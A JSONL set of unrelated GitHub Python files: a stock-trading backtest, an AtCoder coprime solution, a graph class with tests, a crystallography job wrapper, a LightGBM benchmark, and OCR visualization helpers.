+{"seq_id":"12662499811","text":"import pandas as pd\nimport numpy as np\nfrom portfolio import *\nfrom get_data import *\nfrom utils import *\nimport copy\n#from matplotlib import pyplot as plt\n#import seaborn\n\n#housekeeping\nconfig = Config()\ntransaction_fee = config.get_generic_config_property('portfolio','transaction_fee')\nmax_holdings = config.get_generic_config_property('portfolio','max_holdings')\n\n#beginning = datetime.datetime.strptime(config.get_generic_config_property('stocks','start_date'), '%Y-%m-%d').date()\n#finish = datetime.datetime.strptime(config.get_generic_config_property('stocks','end_date'), '%Y-%m-%d').date()\n\nportfolio = Portfolio()\nraw_market_data = GetStocks()\nraw_market_data = raw_market_data.stock_data.dropna()\n\n#time window has to reflect number of trading days, should be number of rows in the raw market data - 1\ntime_window = raw_market_data.shape[0] - 1 #114 #(finish - beginning).days - 5 #days\ntoday = raw_market_data.iloc[2].name.strftime('%Y-%m-%d')\n\n\n\ndef assess_buy_and_hold(portfolio_dict: dict(), raw_market_data: pd.DataFrame()) -> dict():\n buy_and_hold_keys = list(portfolio_dict.keys())\n buy_and_hold_keys.remove('cash')\n final_close = raw_market_data.Close[buy_and_hold_keys].iloc[-1].to_dict()\n portfolio_dict_buy_and_hold_final = portfolio_dict.copy()\n for k, v in portfolio_dict_buy_and_hold_final.items():\n if k == 'cash':\n pass\n else:\n portfolio_dict_buy_and_hold_final[k]['current_price'] = final_close[k]\n return portfolio_dict_buy_and_hold_final\n\n\ndef run_trading_simulation (period, portfolio_dict, date, raw_market_data):\n print(f'here is the initial dict: {portfolio_dict}')\n days_remaining = period\n sell_side_complete = False\n updated_portfolio = portfolio_dict.copy()\n today_index = 2\n day_before_yesterday_index = today_index - 2\n\n while days_remaining > 0:\n print(f'analyzing stocks, {days_remaining} days left to analyze')\n market_data = raw_market_data.iloc[day_before_yesterday_index:today_index] #subset the raw market data to a df of three rows, current, previous, previous - 1\n updated_portfolio = run_trading_day(sell_side_complete, updated_portfolio, date, market_data)\n days_remaining -= 1\n today_index += 1 #must advance the date\n day_before_yesterday_index = today_index - 2\n print(f'here is the updated dict {updated_portfolio}')\n print(\"total value of current portfolio is: \" + total_value(updated_portfolio).astype('str'))\n #update the market price of the holdings in the dictionary here\n return updated_portfolio\n\ndef run_trading_day (sell_side_complete, portfolio_dict, date, market_data):\n print(sell_side_complete)\n # if sell_side_complete == False:\n # print('im buying!')\n # updated_portfolio = run_buy_side(portfolio_dict, date, market_data, portfolio.threshold)\n # else:\n print('im selling!')\n # sell_side_complete, updated_portfolio = run_sell_side(portfolio_dict, date, market_data)\n \n sell_side_complete, updated_portfolio = run_sell_side(portfolio_dict, date, market_data)\n\n print('im buying!')\n updated_portfolio = run_buy_side(portfolio_dict, date, market_data, portfolio.threshold)\n return updated_portfolio\n\ndef run_buy_side (portfolio_dict, date, market_data, threshold):\n ls_to_buy = portfolio.candidates_for_purchase(market_data, threshold) #based on overall candidates recent performance, what if security is already in portfolio? do we differentiate?\n remaining_purchases = len(ls_to_buy)\n portfolio_size = len(portfolio_dict.keys())\n cash = portfolio_dict['cash']\n try:\n cash_for_purchase = (cash / remaining_purchases)\n except:\n cash_for_purchase = 0\n\n while ((cash - transaction_fee) > 0) & (len(ls_to_buy)>0) & (portfolio_size > 0) & (portfolio_size < max_holdings):\n ticker = ls_to_buy.pop(0)\n\n if (ticker not in portfolio_dict.keys()) & (portfolio_size > 0) & ((cash_for_purchase - transaction_fee) > 0):\n portfolio_dict[ticker] = portfolio.make_an_empty_holding()\n portfolio_dict[ticker] = portfolio.purchase_shares(ticker, 'buy', cash_for_purchase, market_data, portfolio_dict[ticker])\n portfolio_dict['cash'] -= cash_for_purchase\n portfolio_size = portfolio.how_many_holdings_to_buy(portfolio_dict)\n cash = portfolio_dict['cash']\n portfolio_size = len(portfolio_dict.keys())\n \n return portfolio_dict\n\ndef run_sell_side (portfolio_dict, date, market_data):\n ls_to_sell = portfolio.candidates_for_sale(portfolio_dict, market_data, portfolio.threshold ) #based on what is in portfolio now\n action = 'sell'\n print(ls_to_sell)\n for holding in ls_to_sell:\n if holding == 'all holdings are down!':\n pass\n else:\n portfolio_dict = portfolio.sell_shares(holding, action, portfolio_dict, market_data)\n sell_side_complete = True\n return sell_side_complete, portfolio_dict\n\ndef total_value (portfolio_dict: dict())->float():\n tmp_value = float()\n for k, v in portfolio_dict.items():\n if k == 'cash':\n pass\n else:\n tmp_value += (portfolio_dict[k]['units'] * portfolio_dict[k]['current_price'])\n \n tmp_value = tmp_value + portfolio_dict['cash']\n return tmp_value\n\n\nif __name__ == \"__main__\":\n \n case_studies = {}\n total_transactions = []\n for sim in range(29):\n portfolio = Portfolio()\n portfolio_dict_raw = {}\n portfolio_dict_raw = portfolio.get_new_portfolio(raw_market_data.iloc[:2], specific_ls=[]).copy()\n print(f'here is the very beginning of dict: {portfolio_dict_raw}')\n portfolio_dict_buy_and_hold = copy.deepcopy(portfolio_dict_raw)\n portfolio_dict_buy_and_hold_final = assess_buy_and_hold(portfolio_dict_buy_and_hold, raw_market_data)\n final_value_buy_and_hold = total_value(portfolio_dict_buy_and_hold_final)\n output_portfolio = run_trading_simulation(time_window, portfolio_dict_raw, today, raw_market_data)\n final_value_buy_and_sell = total_value(output_portfolio)\n case_studies[sim] = {'buy_and_hold':[final_value_buy_and_hold, list(portfolio_dict_buy_and_hold_final.keys())], 'buy_and_sell': [final_value_buy_and_sell, list(output_portfolio.keys())]} #'buy_and_hold':final_value_buy_and_hold,\n total_transactions.append(portfolio.transaction_tracker)\n\n\n","repo_name":"andrewcmilne/stock_analyzer","sub_path":"src/trading_day.py","file_name":"trading_day.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13679790750","text":"from math import gcd\nimport sys\nsys.setrecursionlimit(1000000)\n\ndef main():\n N = int(input())\n A = list(map(int, input().split()))\n tmp = gcd(A[0],A[1])\n set_A = set(A)\n for i in range(2,N):\n tmp = gcd(tmp, A[i])\n\n if tmp != 1:\n print('not coprime')\n exit()\n max_A = max(A)\n ans = [False] * (max_A + 1)\n flag = True\n def divisor(n):\n ass = []\n for i in range(1,int(n**0.5)+1):\n if n%i == 0:\n ass.append(i)\n if ans[i]:\n return False\n if i != 1:\n ans[i] = True\n if i**2 == n:\n continue\n if ans[n//i]:\n return False\n ans[n//i] = True\n ass.append(n//i)\n if n != 1:\n ans[n] = True\n return True #sortされていない\n for a in A:\n if not divisor(a):\n flag = False\n break\n\n if flag:\n print('pairwise coprime')\n else:\n print('setwise coprime')\n \n\n\n\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"tails1434/Atcoder","sub_path":"ABC/177/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73984560648","text":"import argparse\n\nparser = argparse.ArgumentParser(description=\"Run\")\nparser.add_argument('--runnable', '-m', type=str, default=\"chatbot\", help=\"The file to run.\")\n\nargs = parser.parse_args()\n\nif args.runnable == \"chatbot\":\n from runnable.chatbot import run_chatbot\n \n run_chatbot()\n \nelif args.runnable == \"endpoint\":\n from runnable.endpoint import run_model_endpoint\n \n run_model_endpoint()\n \nelif args.runnable == \"discord_index\":\n from runnable.discord_index import run_discord_index\n \n run_discord_index()\n \nelif args.runnable == \"querier\":\n from backend.querier import run_querier\n \n run_querier()\n \nelse :\n raise Exception(\"Invalid runnable.\")","repo_name":"Pangasius/llama-index-tests","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26809306747","text":"import json\nfrom typing import Optional, Union\n\n\nclass AdjacencyListGraph:\n def __init__(self, is_directed: bool = False, is_weighted: bool = False) -> None:\n self.graph: dict[int, list[Union[int, list]]] = {}\n self.is_directed = is_directed\n self.is_weighted = is_weighted\n\n def __str__(self) -> str:\n return json.dumps(self.graph)\n\n def add_vertex(self, vertex: int) -> None:\n \"\"\"Insert a new Vertex.\"\"\"\n if vertex not in self.graph:\n self.graph[vertex] = []\n\n def add_edge(self, vertex_1: int, vertex_2: int, weight: int = 0) -> None:\n \"\"\"Insert and return a new Edge from vertex_1 to vertex_2 with auxiliary element weight.\"\"\"\n for vertex in [vertex_1, vertex_2]:\n self.add_vertex(vertex)\n\n if self.is_edge_existed(vertex_1, vertex_2):\n return\n\n self.graph[vertex_1].append([vertex_2, weight] if self.is_weighted else vertex_2)\n if not self.is_directed:\n self.graph[vertex_2].append([vertex_1, weight] if self.is_weighted else vertex_1)\n\n def is_edge_existed(self, vertex_1: int, vertex_2: int) -> bool:\n \"\"\"Return the boolean value representing the connection between 2 vertices\"\"\"\n for adjacent_vertex in self.get_adjacent_vertices(vertex_1):\n if (adjacent_vertex[0] if self.is_weighted else adjacent_vertex) == vertex_2:\n return True\n return False\n\n def get_edge_weight(self, vertex_1: int, vertex_2: int) -> Optional[int]:\n \"\"\"Return the weight of the edge from vertex_1 to vertex_2, or None if not adjacent.\"\"\"\n if not self.is_weighted:\n return None\n\n for adjacent_vertex, weight in self.get_adjacent_vertices(vertex_1):\n if adjacent_vertex == vertex_2:\n return weight\n\n return None\n\n def set_edge_weight(self, vertex_1: int, vertex_2: int, weight: int = 0) -> None:\n \"\"\"Set the weight of the edge from vertex_1 to vertex_2 if adjacent.\"\"\"\n if not self.is_weighted:\n return\n\n if not self.is_edge_existed(vertex_1, vertex_2):\n return\n\n for start_vertex, end_vertex in (\n [(vertex_1, vertex_2)] if self.is_directed else [(vertex_1, vertex_2), (vertex_2, vertex_1)]\n ):\n for adjacent_vertex in self.get_adjacent_vertices(start_vertex):\n if adjacent_vertex[0] == end_vertex:\n adjacent_vertex[1] = weight\n\n def vertex_count(self) -> int:\n \"\"\"Return the number of vertices in the graph.\"\"\"\n return len(self.graph.keys())\n\n def edge_count(self) -> int:\n \"\"\"Return the number of edges in the graph.\"\"\"\n total_edges = sum(len(adjacent_vertices) for adjacent_vertices in self.graph.values())\n return total_edges if self.is_directed else total_edges // 2\n\n def vertices(self) -> list[int]:\n \"\"\"Return a list of all vertices of the graph.\"\"\"\n return list(self.graph.keys())\n\n def edges(self) -> list[tuple]:\n \"\"\"Return a list of all edges of the graph.\"\"\"\n edges = []\n for vertex, adjacent_vertices in self.graph.items():\n for adjacent_vertex in adjacent_vertices:\n edges.append((vertex, *adjacent_vertex) if self.is_weighted else (vertex, adjacent_vertex))\n return edges\n\n def get_adjacent_vertices(self, vertex: int) -> list[Union[int, list]]:\n \"\"\"Return a list of all vertices connecting with the vertex.\"\"\"\n return self.graph.get(vertex, [])\n\n def in_degree(self, vertex: int) -> Optional[int]:\n \"\"\"Return number of incoming edges incident to the vertex in the graph.\"\"\"\n if not self.is_directed:\n return None\n\n in_degree_total = 0\n for vertex_value, adjacent_vertices in self.graph.items():\n if vertex_value == vertex:\n continue\n\n for adjacent_vertex in adjacent_vertices:\n if (adjacent_vertex[0] if self.is_weighted else adjacent_vertex) == vertex:\n in_degree_total += 1\n\n return in_degree_total\n\n def out_degree(self, vertex: int) -> Optional[int]:\n \"\"\"Return number of outgoing edges incident to the vertex in the graph.\"\"\"\n if not self.is_directed:\n return None\n\n return len(self.get_adjacent_vertices(vertex))\n\n def degree(self, vertex: int) -> int:\n \"\"\"Return number of incident edges to the vertex in the graph.\"\"\"\n if self.is_directed:\n return self.in_degree(vertex) + self.out_degree(vertex)\n\n return len(self.get_adjacent_vertices(vertex))\n\n\nif __name__ == \"__main__\":\n for is_directed, is_weighted in [(False, False), (True, False), (False, True), (True, True)]:\n graph = AdjacencyListGraph(is_weighted=is_weighted, is_directed=is_directed)\n graph.add_vertex(0)\n graph.add_vertex(1)\n graph.add_vertex(2)\n graph.add_edge(1, 2, 1)\n graph.add_edge(2, 3, 2)\n graph.add_edge(4, 3, 3)\n graph.add_edge(4, 5, 4)\n\n assert graph.is_edge_existed(0, 1) is False\n assert graph.is_edge_existed(1, 2) is True\n assert graph.is_edge_existed(2, 1) is False if is_directed else True\n\n assert graph.get_edge_weight(0, 1) is None\n assert graph.get_edge_weight(1, 2) == (1 if is_weighted else None)\n assert graph.get_edge_weight(2, 1) == (1 if is_weighted and not is_directed else None)\n\n graph.set_edge_weight(1, 2, 5)\n assert graph.get_edge_weight(1, 2) == (5 if is_weighted else None)\n assert graph.get_edge_weight(2, 1) == (5 if is_weighted and not is_directed else None)\n\n assert graph.vertex_count() == 6\n assert graph.edge_count() == 4\n assert graph.vertices() == [0, 1, 2, 3, 4, 5]\n\n assert graph.in_degree(2) == (1 if is_directed else None)\n assert graph.out_degree(2) == (1 if is_directed else None)\n assert graph.degree(2) == 2\n\n if not is_directed and not is_weighted:\n assert graph.edges() == [\n (1, 2),\n (2, 1),\n (2, 3),\n (3, 2),\n (3, 4),\n (4, 3),\n (4, 5),\n (5, 4),\n ]\n assert graph.get_adjacent_vertices(2) == [1, 3]\n elif is_directed and not is_weighted:\n assert graph.edges() == [\n (1, 2),\n (2, 3),\n (4, 3),\n (4, 5),\n ]\n assert graph.get_adjacent_vertices(2) == [3]\n elif not is_directed and is_weighted:\n assert graph.edges() == [\n (1, 2, 5),\n (2, 1, 5),\n (2, 3, 2),\n (3, 2, 2),\n (3, 4, 3),\n (4, 3, 3),\n (4, 5, 4),\n (5, 4, 4),\n ]\n assert graph.get_adjacent_vertices(2) == [[1, 5], [3, 2]]\n elif is_directed and is_weighted:\n assert graph.edges() == [\n (1, 2, 5),\n (2, 3, 2),\n (4, 3, 3),\n (4, 5, 4),\n ]\n assert graph.get_adjacent_vertices(2) == [[3, 2]]\n","repo_name":"duongleh/data-structures-and-algorithms","sub_path":"Graph/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":7235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20788061765","text":"import dataclasses\nimport gemmi\nfrom ..job import Job\nfrom ..reflections import DataItem, write_mtz\nfrom ..structure import read_structure, write_mmcif\n\n\n@dataclasses.dataclass\nclass SheetbendResult:\n structure: gemmi.Structure\n seconds: float\n\n\nclass Sheetbend(Job):\n def __init__(\n self,\n structure: gemmi.Structure,\n fsigf: DataItem,\n freer: DataItem = None,\n regularise: bool = False,\n ):\n super().__init__(\"csheetbend\")\n self.structure = structure\n self.fsigf = fsigf\n self.freer = freer\n self.regularise = regularise\n\n def _setup(self) -> None:\n write_mmcif(self._path(\"xyzin.cif\"), self.structure)\n write_mtz(self._path(\"hklin.mtz\"), [self.fsigf, self.freer])\n self._args += [\"-mtzin\", \"hklin.mtz\"]\n self._args += [\"-colin-fo\", self.fsigf.label()]\n if self.freer is not None:\n self._args += [\"-colin-free\", self.freer.label()]\n self._args += [\"-pdbin\", \"xyzin.cif\"]\n self._args += [\"-pdbout\", \"xyzout.cif\"]\n self._args += [\"-cycles\", \"12\"]\n self._args += [\"-resolution-by-cycle\", \"6,3\"]\n if self.regularise:\n self._args += [\"-postrefine-u-iso\"]\n self._args += [\"-pseudo-regularize\"]\n self._args += [\"-refine-regularize-cycles\", \"3\"]\n\n def _result(self) -> SheetbendResult:\n self._check_files_exist(\"xyzout.cif\")\n return SheetbendResult(\n structure=read_structure(self._path(\"xyzout.cif\")),\n seconds=self._seconds,\n )\n","repo_name":"paulsbond/modelcraft","sub_path":"modelcraft/jobs/sheetbend.py","file_name":"sheetbend.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16843222590","text":"import time \nimport lightgbm as lgb \nimport argparse \nfrom sklearn.datasets import make_classification \nfrom sklearn.model_selection import train_test_split \n \n \ndef benchmark_lightgbm(n_rows=100000, n_cols=20, n_classes=2, verbose=True): \n # Generate a random n-class classification problem \n if verbose: \n print(f\"Generating dataset with {n_rows} samples, {n_cols} features...\") \n X, y = make_classification( \n n_samples=n_rows * 2, n_features=n_cols, n_classes=n_classes \n ) \n X_train, X_test, y_train, y_test = train_test_split( \n X, y, random_state=42, test_size=0.5 \n ) \n \n # Define parameters for the LightGBM classifier \n param = { \n \"objective\": \"multiclass\", \n \"num_class\": n_classes, \n \"metric\": \"multi_logloss\", \n \"verbosity\": -1, \n } \n num_round = 20 # the number of training iterations \n \n # Train the model and measure the time it takes \n if verbose: \n print(\"Training model...\") \n start_time = time.time() \n bst = lgb.train(param, lgb.Dataset(X_train, label=y_train), num_round) \n end_time = time.time() \n \n # Measure the time it takes to make predictions \n if verbose: \n print(\"Making predictions...\") \n start_time_pred = time.time() \n predictions = bst.predict(X_test) \n end_time_pred = time.time() \n \n # Return the time it took to train the model and to make predictions \n train_time = end_time - start_time \n pred_time = end_time_pred - start_time_pred \n if verbose: \n print(f\"Training time: {train_time} seconds\") \n print(f\"Prediction time: {pred_time} seconds\") \n results = {\"train_time\": train_time, \"pred_time\": pred_time} \n return results \n \n \nif __name__ == \"__main__\": \n parser = argparse.ArgumentParser() \n parser.add_argument( \n \"--rows\", type=int, default=100000, help=\"Number of rows in the dataset\" \n ) \n parser.add_argument( \n \"--cols\", type=int, default=20, help=\"Number of columns in the dataset\" \n ) \n args = parser.parse_args() \n \n benchmark_lightgbm(n_rows=args.rows, n_cols=args.cols) \n","repo_name":"detrin/datasci-benchmark","sub_path":"lightgbm_benchmark.py","file_name":"lightgbm_benchmark.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41183375545","text":"import torch\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport cv2\nimport math\nimport random\nimport numpy as np\n\n_tableau20 = [(31, 119, 180), (174, 199, 232), (255, 127, 14), (255, 187, 120), \n (44, 160, 44), (152, 223, 138), (214, 39, 40), (255, 152, 150), \n (148, 103, 189), (197, 176, 213), (140, 86, 75), (196, 156, 148), \n (227, 119, 194), (247, 182, 210), (127, 127, 127), (199, 199, 199), \n (188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229)] \n \n# Scale the RGB values to the [0, 1] range, which is the format matplotlib accepts. \nfor i in range(len(_tableau20)): \n r, g, b = _tableau20[i] \n _tableau20[i] = (r / 255., g / 255., b / 255.) \n\n\n\ndef _setup_image(model_input, batch_id=None):\n # Handle torch Variable instances\n if batch_id is None:\n if isinstance(model_input, torch.autograd.Variable):\n img = model_input.data\n else:\n img = model_input\n else:\n if isinstance(model_input, torch.autograd.Variable):\n img = model_input.data[batch_id]\n else:\n img = model_input[batch_id]\n\n # Copy to CPU if needed\n if isinstance(img, torch.cuda.FloatTensor):\n img = img.cpu()\n\n # NumPy-ify and change from CHW to HWC\n img = img.numpy().transpose( (1,2,0) )\n\n # Undo image normalization\n img = img*(-255)+255\n\n if img.shape[2] == 1:\n # matplotlib plots grayscale images correctly only if you get rid of channel dimension\n img = img[:,:,0]\n cmap = plt.cm.gray\n else:\n # OpenCV images are BGR whereas matplotlib assumes RGB\n img = cv2.convertColor(img, cv.COLOR_BGR2RGB)\n cmap = None # fallback to default\n\n return img, cmap \n\n\ndef _form_display_char(idx, alphabet):\n # Special case for CTC Blank\n if idx == 0:\n return '_'\n\n # Special case for space so it shows up\n if alphabet[idx] == 'u0020':\n return '[SP]'\n \n # Otherwise, just convert to utf-8\n return chr(int(alphabet[idx][1:], 16))\n\ndef _find_low_confidence_spans(model_output, alphabet, conf_thresh, batch_id=None):\n # Actual model output is not set to probability vector yet, need to run softmax\n probs = torch.nn.functional.softmax(model_output.view(-1, model_output.size(2))).view(model_output.size(0), model_output.size(1), -1)\n\n if batch_id is None:\n batch_id = 0\n\n # Handle torch Variable instances\n if isinstance(probs, torch.autograd.Variable):\n probs = probs.data[:,batch_id,:]\n else:\n probs = probs[:,batch_id,:]\n\n # Copy to CPU if needed\n if isinstance(probs, torch.cuda.FloatTensor):\n probs = probs.cpu()\n\n # Squeeze away unused dimension\n probs.squeeze_()\n\n # Now let's cycle through frames and check for low confidence regions\n low_confidence_spans = []\n topk = 5\n for t in range(probs.size(0)):\n topk_vals, topk_idxs = torch.topk(probs[t], topk)\n if topk_vals[0] < conf_thresh:\n options = []\n for i in range(topk):\n char = _form_display_char(topk_idxs[i], alphabet)\n options.append( (char, topk_vals[i], topk_idxs[i] ) )\n tot_conf = 0\n for _, prob, _ in options:\n tot_conf += prob\n\n if tot_conf >= conf_thresh:\n break\n\n low_confidence_spans.append( (t, t, options) )\n\n\n return low_confidence_spans\n\ndef _decode_with_alignment_spans(model_output, alphabet, batch_id=None):\n min_prob_thresh = 3* 1/len(alphabet)\n\n if batch_id is None:\n batch_id = 0\n # Handle torch Variable instances\n if isinstance(model_output, torch.autograd.Variable):\n probs = model_output.data[:,batch_id,:]\n else:\n probs = model_output[:,batch_id,:]\n\n # Copy to CPU if needed\n if isinstance(probs, torch.cuda.FloatTensor):\n probs = probs.cpu()\n\n # Now time to decode\n argmaxs, argmax_idxs = probs.max(dim=1)\n argmax_idxs.squeeze_()\n argmaxs.squeeze_()\n prev_max = None\n span_start = 0\n\n alignment_tuples = []\n for t in range(probs.size(0)):\n cur_max_prob = argmaxs[t]\n cur_max = argmax_idxs[t]\n\n # Heuristic\n # If model is predicting very low probability for all letters in alphabet, treat that the\n # samed as a CTC blank\n if cur_max_prob < min_prob_thresh:\n cur_max = 0\n\n if prev_max is None:\n prev_max = cur_max\n continue\n if prev_max != cur_max:\n char = _form_display_char(prev_max, alphabet)\n alignment_tuples.append( (span_start, t, char, prev_max) )\n span_start = t+1\n prev_max = cur_max\n\n # Handle last leftover if nescesary\n if span_start != probs.size(0):\n char = _form_display_char(prev_max, alphabet)\n alignment_tuples.append( (span_start, probs.size(0)-1, char, prev_max) )\n\n return alignment_tuples\n\n\n\ndef display_target(target, alphabet):\n string_utf8 = \"\"\n string_uxxxx = \"\"\n for char_idx in target:\n string_uxxxx += alphabet[char_idx] + ' '\n string_utf8 += chr(int(alphabet[char_idx][1:], 16))\n\n print(\"Target utf8 string is [%s]\" % string_utf8)\n\n # For Arabic, it is sometimes helpful to dipslay the uxxxx output\n# if not alphabet.left_to_right:\n# print(\"Target uxxxx string is: \\n\\t%s\" % string_uxxxx)\n\ndef display_image(model_input, batch_id=None):\n img, cmap = _setup_image(model_input, batch_id)\n\n # Need to determine appropriate figure size\n # For now, hardcoded to 12 inches wide seems to work okay\n w = 12\n h = math.ceil(img.shape[0] * w / img.shape[1])\n fig = plt.figure(figsize=(w,h), dpi=300)\n\n # Setup axis with a bit of margin for viewability\n margin=0.05\n ax = fig.add_axes([margin, margin, 1 - 2*margin, 1 - 2*margin])\n\n # Finally, show image\n ax.set_yticks([])\n ax.set_xticks([])\n ax.imshow(img, cmap=plt.cm.gray)\n plt.show()\n\n\ndef overlay_hidden_activations(model_input, hidden, scale_factor=(1.0/0.49), batch_id=None):\n # Setup input image\n img, cmap = _setup_image(model_input, batch_id)\n\n # Need to determine appropriate figure size\n # For now, hardcoded to 12 inches wide seems to work okay\n w = 12\n h = math.ceil(img.shape[0] * w / img.shape[1])\n\n # (1) Setup raw plot of hidden activations overlayed on image\n fig = plt.figure(figsize=(w,h), dpi=300)\n\n # Setup axis with a bit of margin for viewability\n margin=0.05\n ax = fig.add_axes([margin, margin, 1 - 2*margin, 1 - 2*margin])\n\n # Now simply plot hidden activations in image\n if isinstance(hidden, torch.autograd.Variable) or isinstance(hidden, torch.FloatTensor):\n hidden = hidden.cpu().numpy()\n\n ax2 = ax.twinx()\n hidden_xs = range(hidden.shape[0])\n hidden_xs = [x*scale_factor for x in hidden_xs]\n ax2.plot(hidden_xs, hidden)\n ax2.set_ylim(-1,1)\n ax2.set_yticks([])\n ax2.set_xticks([])\n\n # Finally, show image\n ax.set_yticks([])\n ax.set_xticks([])\n\n ax.imshow(img, cmap=plt.cm.gray)\n plt.show()\n\n # (2) Setup color-coded background overlay\n fig = plt.figure(figsize=(w,h), dpi=300)\n\n # Setup axis with a bit of margin for viewability\n margin=0.05\n ax = fig.add_axes([margin, margin, 1 - 2*margin, 1 - 2*margin])\n\n # Correct for interpolation due to scaling\n # Basic idea is to split the difference: half of 'gap' goes to left-side, half of 'gap' goes to right side\n left_correction = math.floor(scale_factor/2)\n right_correction = math.floor(scale_factor/2)\n for t in range(hidden.shape[0]):\n left_x = scale_factor*t - left_correction\n right_x = scale_factor*(t+1) + right_correction\n \n #seismic or bwr\n ax.axvspan(left_x, right_x, color=plt.cm.seismic( (hidden[t]+1)/2 ), alpha=0.5)\n\n\n ax.set_yticks([])\n ax.set_xticks([])\n ax.imshow(img, cmap=plt.cm.gray)\n plt.show()\n\n\n\ndef overlay_alignment(model_input, model_output, alphabet, scale_factor=(1.0/0.49), batch_id=None):\n # Setup input image\n img, cmap = _setup_image(model_input, batch_id)\n\n # Need to determine appropriate figure size\n # For now, hardcoded to 12 inches wide seems to work okay\n w = 12\n h = math.ceil(img.shape[0] * w / img.shape[1])\n fig = plt.figure(figsize=(w,h), dpi=300)\n\n # Setup axis with a bit of margin for viewability\n margin=0.05\n ax = fig.add_axes([margin, margin, 1 - 2*margin, 1 - 2*margin])\n\n # Now handle argmax decoding\n alignment_tuples = _decode_with_alignment_spans(model_output, alphabet, batch_id)\n\n # Now color-code spans\n for span_start, span_end, span_char, span_char_id in alignment_tuples: \n letter_color = _tableau20[span_char_id % len(_tableau20)]\n\n # Correct for interpolation due to scaling\n # Basic idea is to split the difference: half of 'gap' goes to left-side, half of 'gap' goes to right side\n left_correction = math.floor(scale_factor/2)\n right_correction = math.floor(scale_factor/2)\n\n left_x = scale_factor*span_start - left_correction\n right_x = scale_factor*span_end + right_correction\n\n ax.axvspan(left_x, right_x, color=letter_color, alpha=0.5)\n\n # Place label for span in center of span\n # Also prepare line segment to point to span\n label_x = (left_x + right_x)/2\n label_y = -10\n rotation = 0\n label_x_correction = 0\n if span_char == \"[SP]\":\n rotation = 90\n label_x_correction = -2\n label_y = -20\n\n ax.annotate(span_char, (label_x,0), (label_x + label_x_correction, label_y), arrowprops={'arrowstyle': '->'}, xycoords='data', textcoords='data', rotation=rotation)\n\n # Finally, show image\n ax.set_yticks([])\n ax.set_xticks([])\n ax.imshow(img, cmap=plt.cm.gray)\n plt.show()\n\n\ndef display_low_confidence_regions(model_input, model_output, alphabet, scale_factor=(1.0/0.49), conf_thresh=0.99, batch_id=None):\n # Setup input image\n img, cmap = _setup_image(model_input, batch_id)\n\n # Need to determine appropriate figure size\n # For now, hardcoded to 12 inches wide seems to work okay\n w = 12\n h = math.ceil(img.shape[0] * w / img.shape[1])\n fig = plt.figure(figsize=(w,h), dpi=300)\n\n # Setup axis with a bit of margin for viewability\n margin=0.05\n ax = fig.add_axes([margin, margin, 1 - 2*margin, 1 - 2*margin])\n ax.set_yticks([])\n ax.set_xticks([])\n\n # Now handle argmax decoding\n spans = _find_low_confidence_spans(model_output, alphabet, conf_thresh, batch_id)\n\n low_conf_area = 0\n low_conf_area_v2 = 0\n\n # Use these to remember the number of characters we showed previuosly, to properly position current labels\n # Even-numbered spans are above the image and odd-numbered spans are below, so keep track of both seperately\n prev_len_even = 2\n prev_len_odd = 2\n\n # Now color-code spans\n for span_idx, (span_start, span_end, char_array) in enumerate(spans): \n low_conf_area += (span_end - span_start + 1)\n\n # Want to count perent of area where confusion is between more than one character in the model,\n # Not just between CTC-Blank and a character in the model\n if len(char_array) > 2 or (len(char_array) == 2 and (char_array[0][2] != 0 and char_array[1][2] != 0)):\n low_conf_area_v2 += (span_end - span_start + 1)\n\n span_color = _tableau20[random.randint(0, len(_tableau20)-1)]\n\n # Correct for interpolation due to scaling\n # Basic idea is to split the difference: half of 'gap' goes to left-side, half of 'gap' goes to right side\n left_correction = math.floor(scale_factor/2)\n right_correction = math.floor(scale_factor/2)\n\n left_x = scale_factor*span_start - left_correction\n right_x = scale_factor*span_end + right_correction\n\n ax.axvspan(left_x, right_x, color=span_color, alpha=0.5)\n\n # Place label for span in center of span\n # Also prepare line segment to point to span\n label_x = (left_x + right_x)/2\n label_x_correction = -8\n\n delta = 10\n if span_idx % 2 == 0:\n delta_y = -delta\n arrow_y = 5\n\n if span_idx % 4 == 0:\n label_y = -delta\n else:\n label_y = -delta + prev_len_even * delta_y \n\n\n prev_len_even = len(char_array)\n else:\n delta_y = delta\n arrow_y = img.shape[0] - delta\n\n if span_idx % 4 == 1:\n label_y = img.shape[0] + delta\n else:\n label_y = delta + prev_len_odd * delta_y + img.shape[0]\n\n prev_len_odd = len(char_array)\n char_array = list(reversed(char_array))\n\n for i, (char, prob, char_idx) in enumerate(char_array):\n if i == len(char_array)-1:\n ax.annotate(\"%s (%d)\" % (char,int(100*prob)), (label_x,arrow_y), (label_x + label_x_correction, (label_y + delta_y*(len(char_array)-i-1))), arrowprops={'arrowstyle': '->', 'alpha': 0.2}, xycoords='data', textcoords='data', color=span_color)\n else:\n ax.text(label_x + label_x_correction, (label_y + delta_y*(len(char_array)-i-1)), \"%s (%d)\" % (char,int(100*prob)), color=span_color)\n\n\n\n # Finally, show image\n print(\"Percentage of frames having confidence < %.2f is %.2f%%. Shown below:\" % (conf_thresh, 100*low_conf_area/model_output.size(0)))\n print(\"Percentage of frames having confidence < %.2f with confusion b/w more than CTC blank is %.2f%%. Shown below:\" % (conf_thresh, 100*low_conf_area_v2/model_output.size(0)))\n ax.set_yticks([])\n ax.set_xticks([])\n ax.imshow(img, cmap=plt.cm.gray)\n plt.show()\n","repo_name":"isi-vista/VistaOCR","sub_path":"src/utils/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":13794,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"16"} 